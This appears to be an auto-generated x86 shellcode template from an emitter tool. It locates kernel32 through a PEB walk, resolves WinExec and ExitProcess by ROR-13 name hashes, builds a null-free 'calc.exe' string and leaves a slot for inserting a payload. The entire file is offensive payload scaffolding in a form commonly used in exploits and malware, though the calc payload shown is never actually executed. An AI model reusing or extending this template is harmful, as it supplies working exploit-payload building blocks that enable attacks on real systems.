; AUTO-GENERATED by emitter-v1
; Manifest: Tools/emitter/manifests/calc.yaml
; Template: none
; Generated: 2026-07-14 20:59:48

    _start:
        jmp main

; ── Framework Stubs ────────────────────────────────────────────────

find_module:
    call get_first_ldr_entry
    jmp find_kernel32_entry

get_first_ldr_entry:
    xor ecx, ecx
    mov eax, fs:[ecx + 0x30]
    mov eax, [eax + 0x0c]
    mov eax, [eax + 0x1c]
    sub eax, 0x10
    ret

find_kernel32_entry:
    mov esi, [eax + 0x30]
    cmp word ptr [esi], 0x004b
    jne next
    cmp word ptr [esi+2], 0x0045
    jne next
    cmp word ptr [esi+12], 0x0033
    jne next
    mov ebx, [eax + 0x18]
    ret

next:
    mov eax, [eax + 0x10]
    sub eax, 0x10
    jmp find_kernel32_entry

get_export_directory:
    mov eax, [ebx+0x3c]
    add eax, ebx
    mov eax, [eax+0x78]
    add eax, ebx
    ret

get_export_tables:
    mov ecx, [eax+0x18]
    mov edi, [eax+0x20]
    add edi, ebx
    mov edx, [eax+0x24]
    add edx, ebx
    mov esi, [eax+0x1c]
    add esi, ebx
    ret

save_export_context:
    mov [ebp-0x04], ebx
    mov [ebp-0x08], edi
    mov [ebp-0x0c], edx
    mov [ebp-0x10], esi
    mov [ebp-0x14], ecx
    ret

resolve_export_by_hash:
    mov [ebp-0x18], eax
    xor ecx, ecx

find_export_loop:
    mov edi, [ebp - 0x08]
    mov eax, [edi + ecx*4]
    add eax, [ebp - 0x04]
    mov esi, eax
    call compute_hash
    cmp edx, [ebp-0x18]
    je resolve_matched_export

inc_next:
    inc ecx
    cmp ecx, [ebp - 0x14]
    jl find_export_loop

compute_hash:
    xor eax, eax
    xor edx, edx
    cld

hash_loop:
    lodsb
    test al, al
    jz hash_done
    ror edx, 0x0d
    movzx eax, al
    add edx, eax
    jmp hash_loop

hash_done:
    ret

resolve_matched_export:
    mov edx, [ebp - 0x0c]
    movzx eax, word ptr [edx + ecx*2]
    mov esi, [ebp - 0x10]
    mov eax, [esi + eax*4]
    add eax, [ebp - 0x04]
    ret

; ── Main ───────────────────────────────────────────────────────────

main:
    mov  ebp, esp
    add  esp, 0xfffffb00

    ; Bootstrap: find kernel32 via PEB walk
    call find_module
    call get_export_directory
    call get_export_tables
    call save_export_context

; ── kernel32.dll (peb) ────────────────────────────────────────────

    ; WinExec  [ebp-0x24]
    mov  eax, 0x0e8afe98
    call resolve_export_by_hash
    mov  [ebp-0x24], eax

    ; ExitProcess  [ebp-0x28]
    mov  eax, 0x73e2d87e
    call resolve_export_by_hash
    mov  [ebp-0x28], eax

; ── String Construction ─────────────────────────────────────────────

; --- cmd: "calc.exe" (mov) ---
    lea  edi, [ebp-0x8c]
; emit_mov: "calc.exe" (null-safe)
; 12 bytes written to [edi]

    mov  eax, 0x636c6163
    mov  [edi], eax
    mov  eax, 0x6578652e
    mov  [edi+0x4], eax
    mov  eax, 0x01010101
    xor  eax, 0x01010101  ; decode → 0x00000000
    mov  [edi+0x8], eax

; ── Structure Initialization ────────────────────────────────────────

; (no structures)

; ── Payload ─────────────────────────────────────────────────────────

; (no template — insert payload assembly here)

hang:
    jmp hang
